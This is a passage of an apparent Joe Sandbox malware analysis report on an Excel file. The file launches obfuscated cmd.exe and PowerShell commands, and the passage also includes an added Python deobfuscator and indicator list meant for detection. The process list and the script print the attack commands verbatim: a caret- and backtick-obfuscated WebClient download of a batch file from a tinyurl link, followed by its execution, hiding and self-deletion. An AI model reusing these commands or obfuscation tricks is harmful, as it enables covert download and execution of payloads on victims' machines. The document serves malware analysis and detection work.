                                                              Nov 18, 2020 02:58:20.067867041 CET | 192.168.2.3 | 8.8.8.8 | 0xa943 | Standard query (0) | tinyurl.com | A (IP address) | IN (0x0001)

                                                              DNS Answers

                                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                              Nov 18, 2020 02:58:20.103576899 CET | 8.8.8.8 | 192.168.2.3 | 0xa943 | No error (0) | tinyurl.com | (none) | 104.20.139.65 | A (IP address) | IN (0x0001)
                                                              Nov 18, 2020 02:58:20.103576899 CET | 8.8.8.8 | 192.168.2.3 | 0xa943 | No error (0) | tinyurl.com | (none) | 172.67.1.225 | A (IP address) | IN (0x0001)
                                                              Nov 18, 2020 02:58:20.103576899 CET | 8.8.8.8 | 192.168.2.3 | 0xa943 | No error (0) | tinyurl.com | (none) | 104.20.138.65 | A (IP address) | IN (0x0001)

                                                              HTTPS Packets

                                                              Timestamp:Nov 18, 2020 02:58:20.206509113 CET
                                                              Source IP:104.20.139.65
                                                              Source Port:443
                                                              Dest IP:192.168.2.3
                                                              Dest Port:49688
                                                              Subject (server certificate):CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
                                                              Issuer (server certificate):CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US
                                                              Not Before (server certificate):Mon Aug 03 02:00:00 CEST 2020
                                                              Not After (server certificate):Tue Aug 03 14:00:00 CEST 2021
                                                              Subject (issuing CA certificate):CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US
                                                              Issuer (issuing CA certificate):CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
                                                              Not Before (issuing CA certificate):Mon Jan 27 13:46:39 CET 2020
                                                              Not After (issuing CA certificate):Wed Jan 01 00:59:59 CET 2025
                                                              JA3 SSL Client Fingerprint:769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
                                                              JA3 SSL Client Digest:54328bd36c14bd82ddaa0c04b25ed9ad

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Memory Usage

                                                              High Level Behavior Distribution

                                                              Behavior

                                                              System Behavior

                                                              General

                                                              Start time:02:56:43
                                                              Start date:18/11/2020
                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                              Imagebase:0xaf0000
                                                              File size:27110184 bytes
                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:49
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:49
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:49
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:02:56:50
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:02:58:15
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                              Imagebase:0xdf0000
                                                              File size:19456 bytes
                                                              MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

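The five cmd.exe launches above carry the same PowerShell payload under two layers of shell obfuscation: cmd.exe carets (`power^shell`, consumed by cmd.exe before the word reaches the child) and PowerShell backticks inside bare words (`stARt`-slE`Ep`, `nEw-oB`jecT`) plus a concatenated method name (`('Down'+'loadFile')`), with `-w 1` hiding the window. The following Python is an added example, not part of the Joe Sandbox report: it normalises the command lines exactly as recorded in the process list and tags the behaviours (download from a shortener, sleep, hide, self-delete) that a detection would key on. The indicator table is a hypothetical one for this example.

```python
"""Added example (not part of the Joe Sandbox report): normalise the cmd.exe
caret and PowerShell backtick obfuscation seen in the process list above and
flag the behaviours a detection would key on."""
import re

# The command lines exactly as recorded in the report's process list.
OBSERVED = [
    "cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'",
    "cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force",
    "cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat",
    "cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'",
    "cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')"
    ".'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')",
]

# Hypothetical indicator table for this example; substrings are matched against
# the normalised, lower-cased command line.
INDICATORS = {
    "downloadfile": "payload fetched with Net.WebClient.DownloadFile",
    "tinyurl.com": "URL shortener used as the download source",
    "start-sleep": "sleep before acting (timing / sandbox evasion)",
    "attrib +s +h": "dropped file hidden with system+hidden attributes",
    "remove-item": "self-cleanup of the dropped file",
}

# Windows PowerShell escape letters that must survive normalisation; any other
# backticked character simply becomes that character (treated case-sensitively).
PS_ESCAPES = set("0abfnrtv")


def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe consumes a caret as an escape outside double quotes: ^x -> x, ^^ -> ^."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def strip_ps_backticks(ps: str) -> str:
    """Drop backtick escapes outside single-quoted strings. Inside single quotes
    PowerShell takes the backtick literally, so those are left untouched."""
    out, i, in_single = [], 0, False
    while i < len(ps):
        ch = ps[i]
        if ch == "'":
            in_single = not in_single
            out.append(ch)
        elif ch == "`" and not in_single and i + 1 < len(ps):
            nxt = ps[i + 1]
            out.append(ch + nxt if nxt in PS_ESCAPES else nxt)
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def join_literals(ps: str) -> str:
    """Fold 'a'+'b' into 'ab' and .('Name') / .'Name' member access into .Name."""
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while concat.search(ps):
        ps = concat.sub(r"'\1\2'", ps)
    ps = re.sub(r"\.\('([A-Za-z_]\w*)'\)", r".\1", ps)
    return re.sub(r"\.'([A-Za-z_]\w*)'", r".\1", ps)


def normalise(cmdline: str) -> str:
    """Apply the layers in the order the shells would: cmd.exe first, then PowerShell."""
    return join_literals(strip_ps_backticks(strip_cmd_carets(cmdline)))


def indicators(cmdline: str) -> list:
    """Return the INDICATORS keys present in the normalised command line."""
    low = normalise(cmdline).lower()
    return [key for key in INDICATORS if key in low]


if __name__ == "__main__":
    for raw in OBSERVED:
        print(normalise(raw))
        for key in indicators(raw):
            print("   ->", INDICATORS[key])
```

The single-quote handling is the caveat worth keeping: PowerShell does not interpret backticks or `$` inside single-quoted strings, so as recorded here the Move-Item destination and the cd argument are the literal strings `$e`nV:T`EMP` and `$e`nV:T`EMP; ./pd.bat`, not the user's temp directory. The report does not state whether those two steps succeeded; it does show attrib.exe launched against pd.bat at 02:58:15, so match on the normalised download, sleep, attrib and Remove-Item tokens rather than on a specific path.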
                                                              Disassembly

                                                              Code Analysis


                                                                Execution Graph

                                                                Execution Coverage:7.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:4.2%
                                                                Total number of Nodes:72
                                                                Total number of Limit Nodes:4

                                                                Graph

                                                                [Execution graph rendered as an image in the original report; the serialised node list is omitted. Recoverable detail: the graph covers the powershell.exe memory regions at 0x3070000 and 0x31d0000, with edges into GetPointerCursorId, RtlEncodePointer and DrawStateW.]

                                                                Executed Functions

                                                                Control-flow Graph

                                                                [Control-flow graph rendered as an image in the original; the node list is omitted. Recoverable detail: the function starts at 0x307d0c0, its blocks span roughly 0x307d0b0 to 0x307dd04, and the graph records calls to 0x307d867, 0x307d7d3, 0x307d0b0 and 0x307d0c0.]
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 271ab56c608b5dc87d19cb1ada3fb8d03ee75856bd1cfaec31bca1ce6d8bd555
                                                                • Instruction ID: f644c29e428969fee793b350f79fe5dfe979792746e079366ca3b6611eda5e62
                                                                • Opcode Fuzzy Hash: 271ab56c608b5dc87d19cb1ada3fb8d03ee75856bd1cfaec31bca1ce6d8bd555
                                                                • Instruction Fuzzy Hash: B5628D34A01609DFCB14DF69D850AAEB7F2FF88304F188969E505AB360DB70ED46CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                [Control-flow graph rendered as an image in the original; the node list is omitted. Recoverable detail: the function starts at 0x31d0040, its blocks span roughly 0x31d0040 to 0x31d0b3d, and the graph records calls to 0x31d068c, 0x31d0006 and 0x31d0040.]
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de63c114a4c3a2d6fa4f317738e81dacf56278f7678460e513407b224ea592cf
                                                                • Instruction ID: 86c4ff55a593d419c1ee183a172d37c26fe2c5766430fc3396f9d1531c2dd2ca
                                                                • Opcode Fuzzy Hash: de63c114a4c3a2d6fa4f317738e81dacf56278f7678460e513407b224ea592cf
                                                                • Instruction Fuzzy Hash: D3426A34A01219CFDB24DF64C854BADB7B2FF89305F1445A9D80AAB391DB35AD81CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                [Control-flow graph rendered as an image in the original; the node list is omitted. Recoverable detail: the function starts at 0x307a6e7, its blocks span roughly 0x307a6e7 to 0x307af22, and the graph records calls to 0x307af71 and 0x307af80.]
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51f5f8934259f74ba6c2538c07e6bcd85fc2e176e202df065279a73313bd9ddb
                                                                • Instruction ID: 01ea6a213d42740515828c10c5dd2f754862b59aca046fcc62c099ff5e2ff04a
                                                                • Opcode Fuzzy Hash: 51f5f8934259f74ba6c2538c07e6bcd85fc2e176e202df065279a73313bd9ddb
                                                                • Instruction Fuzzy Hash: DE227B34B012049FDB44DBA5C994AAEB7F6AF88304F248468E902DF395DB39ED45CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Control-flow graph (rendered graph image; node and edge list omitted): basic blocks in the range 307ba50-307bfd0, with a call to 307b3a0.
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 708a24726a9d36d976c461e0d29c4b084bc671704af71527173ae335c26d49b1
                                                                • Instruction ID: 6cfc1ac923eef21e1db5d590e35bfc03adb229dad0a704bf98b912e62ee82c2b
                                                                • Opcode Fuzzy Hash: 708a24726a9d36d976c461e0d29c4b084bc671704af71527173ae335c26d49b1
                                                                • Instruction Fuzzy Hash: 5E028C34A012098BDF59DFB5C8906AEBBB6BF89304F18856DEC019F295EB75E841CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 266bbee71c16614ffb6e40d6e693346c3f62d621922ebe755f6a252d334bb8a7
                                                                • Instruction ID: a861e1bba68b39b216c07ddec553628ab456d1282ba84c8b18b5a6d81f672876
                                                                • Opcode Fuzzy Hash: 266bbee71c16614ffb6e40d6e693346c3f62d621922ebe755f6a252d334bb8a7
                                                                • Instruction Fuzzy Hash: 8BB1AA74B042088FDB14DFB4D854AAEBBF6EFC9200F19856DD406AB394DF349C428B62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f44b5aa5a040b01d661a51a8551d4d3c863c2f12497a5f0e582d3e7e8ab6ed43
                                                                • Instruction ID: c8a7ed649f606cae42f93b13309ebad92cebcce5b44486d7cf781951ec38a751
                                                                • Opcode Fuzzy Hash: f44b5aa5a040b01d661a51a8551d4d3c863c2f12497a5f0e582d3e7e8ab6ed43
                                                                • Instruction Fuzzy Hash: EF912275E0071A8BDB14CF65CC44799F7B6BFC9304F248699D409BB240EBB0A985CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 193 31d5f27-31d5f32 194 31d5f3c-31d9759 call 31d67bd 193->194 195 31d5f34-31d5f36 193->195 200 31d9761-31d978c RtlEncodePointer 194->200 195->194 201 31d978e-31d9794 200->201 202 31d9795-31d97a9 200->202 201->202
                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,031D872A), ref: 031D977F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 8e7ecb584e9f04456b901e299104bb9114a82f884f029b2396959cf3ff4eede4
                                                                • Instruction ID: ff574380279f979a793144efa15040a24490c73a62fb34b5891069812e267464
                                                                • Opcode Fuzzy Hash: 8e7ecb584e9f04456b901e299104bb9114a82f884f029b2396959cf3ff4eede4
                                                                • Instruction Fuzzy Hash: 482180B1C043889FDB11DFA9C494BCEBFF4EF0A214F18449AD558AB241D3385448CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 204 31d2ab0-31d2ae3 208 31d2ae5 call 31d2a08 204->208 209 31d2ae5 call 31d29fa 204->209 205 31d2aeb-31d2aed 206 31d2aef-31d2af7 205->206 207 31d2afa-31d2b42 DrawStateW 205->207 208->205 209->205
                                                                APIs
                                                                • DrawStateW.USER32(?,?,?,?,?), ref: 031D2B36
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: DrawState
                                                                • String ID:
                                                                • API String ID: 345284738-0
                                                                • Opcode ID: 8587c938e6ee193b263d640a29f270e658e7bfc27d989fc8d5422a09f7cfb94b
                                                                • Instruction ID: d8a6529e8fb3092248e6c733b36f2225463cc277ea2353a1417dd431a53e9ce4
                                                                • Opcode Fuzzy Hash: 8587c938e6ee193b263d640a29f270e658e7bfc27d989fc8d5422a09f7cfb94b
                                                                • Instruction Fuzzy Hash: F111EF72D0010DAFCF41DF99D8049EEBBB9FF88314F00866AE518E2120E7319665DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 216 31d9718-31d9759 217 31d9761-31d978c RtlEncodePointer 216->217 218 31d978e-31d9794 217->218 219 31d9795-31d97a9 217->219 218->219
                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,031D872A), ref: 031D977F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 7dae39876c6495b6c735762d935c97a9706f09472cc884af7b3dc05c769d05be
                                                                • Instruction ID: 228402d81fa67f7a72111ddb05f122968430a07ea3804e54349aa062c3e9db4d
                                                                • Opcode Fuzzy Hash: 7dae39876c6495b6c735762d935c97a9706f09472cc884af7b3dc05c769d05be
                                                                • Instruction Fuzzy Hash: 511133B48002498FCB20CFA9D484BEEBFF4EB49324F24846AD419A7600C378A544CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 210 31d5f54-31d978c RtlEncodePointer 213 31d978e-31d9794 210->213 214 31d9795-31d97a9 210->214 213->214
                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,031D872A), ref: 031D977F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 6f813641a7568e1cec7d09df13fb1935273fb0b3985ae509ae1faa8454e8e652
                                                                • Instruction ID: 5b7aeb17bc6146eeb7d4388b2432bb2ec4dff0e360c22241fa77375995696f0e
                                                                • Opcode Fuzzy Hash: 6f813641a7568e1cec7d09df13fb1935273fb0b3985ae509ae1faa8454e8e652
                                                                • Instruction Fuzzy Hash: 5911FEB49003189FCB10DF99C888BDEBBF4EB49324F24846AE519A7600D378A944CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 221 307af71-307afaf GetPointerCursorId 223 307afb0 221->223
                                                                APIs
                                                                • GetPointerCursorId.USER32(?,?,?,?,00000000,?,?,?), ref: 0307AFA8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CursorPointer
                                                                • String ID:
                                                                • API String ID: 93376120-0
                                                                • Opcode ID: 760dc55a6c352ddbbd0ee6f8872e0c243504488a4da12a82f4af3c1007a08fe0
                                                                • Instruction ID: 12a1e1ff48f216c6c21cca6870363dc031596285c9c83f9acc3d929d04292e18
                                                                • Opcode Fuzzy Hash: 760dc55a6c352ddbbd0ee6f8872e0c243504488a4da12a82f4af3c1007a08fe0
                                                                • Instruction Fuzzy Hash: 4CF01C7240420DFFCF01CFA4DC018EA7FBAEB49200B048096F90487121D6369A31ABA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 224 307af80-307afaf GetPointerCursorId 225 307afb0 224->225
                                                                APIs
                                                                • GetPointerCursorId.USER32(?,?,?,?,00000000,?,?,?), ref: 0307AFA8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CursorPointer
                                                                • String ID:
                                                                • API String ID: 93376120-0
                                                                • Opcode ID: a35a8a6249199463ee2009129ba37745ebb7ee05f969ff433990af36acd7fa87
                                                                • Instruction ID: 01206c2e02d2534e3af45086054988c855da75075a6cdfea25c77dd1bb83d7b5
                                                                • Opcode Fuzzy Hash: a35a8a6249199463ee2009129ba37745ebb7ee05f969ff433990af36acd7fa87
                                                                • Instruction Fuzzy Hash: 67E0927690020DFF9F01DEA19D00CAF7BBAEB48200B10C465BA0496120E6328A31ABA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: d2e0ba86792247daf5039b2b4523e15413d9a084a91a00668940baf4f17823b3
                                                                • Instruction ID: fd260780061b575410be2ba4e7b25b6823d6a82825649bd706a5f02494dc28be
                                                                • Opcode Fuzzy Hash: d2e0ba86792247daf5039b2b4523e15413d9a084a91a00668940baf4f17823b3
                                                                • Instruction Fuzzy Hash: 8B825974F012188FDB64DF74C854AAEBBF6AF88304F1485AED40AAB351DB319E858F45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

